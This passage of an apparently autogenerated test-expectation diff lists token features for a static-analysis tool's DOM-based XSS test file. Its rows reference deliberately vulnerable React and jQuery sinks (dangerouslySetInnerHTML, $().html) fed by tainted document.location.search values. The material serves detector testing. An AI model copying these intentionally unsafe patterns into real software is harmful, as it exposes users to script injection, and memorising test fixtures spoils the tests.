dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | exceptional return of method test of class C2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | exceptional return of method test of class C2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | return of method test of class C2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | return of method test of class C2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | return of method test of class C2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | return of method test of class C2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:224:13:233:9 | return of method test of class C2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:13 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:13 | $ | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:13 | $ | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:13 | $ | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:13 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:21 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:21 | $('myId') | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:21 | $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:21 | $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:21 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:21 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:21 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:21 | exceptional return of $('myId') | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:21 | exceptional return of $('myId') | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:21 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:26 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:26 | $('myId').html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:26 | $('myId').html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:26 | $('myId').html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:26 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:47 | $('myId ... inted1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:47 | $('myId ... inted1) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:47 | $('myId ... inted1) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:47 | $('myId ... inted1) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:47 | $('myId ... inted1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:47 | exceptional return of $('myId ... inted1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:47 | exceptional return of $('myId ... inted1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:47 | exceptional return of $('myId ... inted1) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:47 | exceptional return of $('myId ... inted1) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:225:13:225:47 | exceptional return of $('myId ... inted1) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:225:15:225:20 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:225:15:225:20 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:225:15:225:20 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16972,6 +117616,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:225:15:225:20 | 'myId' | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:225:15:225:20 | 'myId' | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:225:15:225:20 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:225:23:225:26 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:225:23:225:26 | html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:225:23:225:26 | html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:225:23:225:26 | html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:225:23:225:26 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:225:28:225:31 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:225:28:225:31 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:225:28:225:31 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:225:28:225:31 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:225:28:225:31 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:225:28:225:37 | this.props | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:225:28:225:37 | this.props | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:225:28:225:37 | this.props | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:225:28:225:37 | this.props | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:225:28:225:37 | this.props | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:225:28:225:46 | this.props.tainted1 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:225:28:225:46 | this.props.tainted1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:225:28:225:46 | this.props.tainted1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16979,6 +117638,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:225:28:225:46 | this.props.tainted1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:225:28:225:46 | this.props.tainted1 | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:225:28:225:46 | this.props.tainted1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:225:33:225:37 | props | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:225:33:225:37 | props | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:225:33:225:37 | props | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:225:33:225:37 | props | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:225:33:225:37 | props | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:225:39:225:46 | tainted1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:225:39:225:46 | tainted1 | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:225:39:225:46 | tainted1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:225:39:225:46 | tainted1 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:225:39:225:46 | tainted1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:13 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:13 | $ | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:226:13:226:13 | $ | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props 